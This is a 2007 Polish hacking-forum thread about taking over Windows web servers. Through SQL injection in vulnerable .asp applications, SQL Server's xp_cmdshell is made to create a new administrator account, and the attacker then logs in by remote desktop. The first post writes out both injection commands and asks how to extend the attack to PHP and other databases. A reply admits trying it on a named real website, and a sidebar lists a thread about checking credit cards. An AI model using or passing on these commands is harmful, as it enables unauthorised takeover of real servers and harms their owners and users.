shell code injection & remote desktop exploit :)

**gogulas** · 11-11-2007

jest sobie taki exploit:

http://milw0rm.com/video/watch.php?id=70
(videło)

Całkiem sympatyczna sprawa, jeszcze ten zdalny pulpet mMMmmMm

Rozchodzi sie w nim o wydanie polecen przez dziurawa aplikacje obslugujaca baze dbo:

Kod:

exec master..xp_cmdshell 'net user xxx 123456 /add'

Kod:

exec master..xp_cmdshell 'net localgroup administrators xxx /add'

Jesli strona ta dzialala na prawach roota, badz na uprawnienioach ktore pozwalaly chociazby stworzyc nowego uzytkownika, to mozemy polaczyc sie ze zdalnym pulpitem i robic co nam sie spodoba, no oczywiscie o ile ten serwer ma wlaczona usluge zdalnego pulpitu, czesto tak wlasnie jest

sprawa dotyczny aplikacji .asp i baz danych dbo, ale ciekawmi mnie czy jeszcze jakos mozna by wydac podobne polecenia np. w dziuramym php, w innych bazach, albo w ogole bez baz... tylko jak nie ma baz to aplikacja z reguly z niczym "nie gada" i nie ma gdzie sie doczepic z takim kodem, no ale nie wiem do konca czy tak jest, czekam na opinie...
Aha, i czy komendy te beda takie same dla windows serwer 2000 i 2005.

**GSG-9** · 11-12-2007

ten filmik praktykowalem wlasnie na chestergas.com bodajze krotko po ukazaniu sie filmiku

jest sobie taki exploit:

to nie jest exploit

tylko niewiem czemu niemoglem znalezc zadnej innej strony podatnej na ten atak

**gogulas** · 11-12-2007

nazwij to jak chcesz, exploit czy nie exploit, nevermind

Ja wiem dlaczego nie mogles znalesc, .asp nie byly dziurawe, ja sobie sprawdzalem ile stron z .asp ma zdalny pulpet uruchomiony, ~70%

Temat: shell code injection & remote desktop exploit :)

Narzędzia wątku

Display

shell code injection & remote desktop exploit :)

Podobne wątki

remote shell w SP2 ?

Remote PC , Hack Shop CFM and Check CC Here

read&write

Cain&Abel

ColdFusion & błąd

Zasady Postowania

Subskrybuj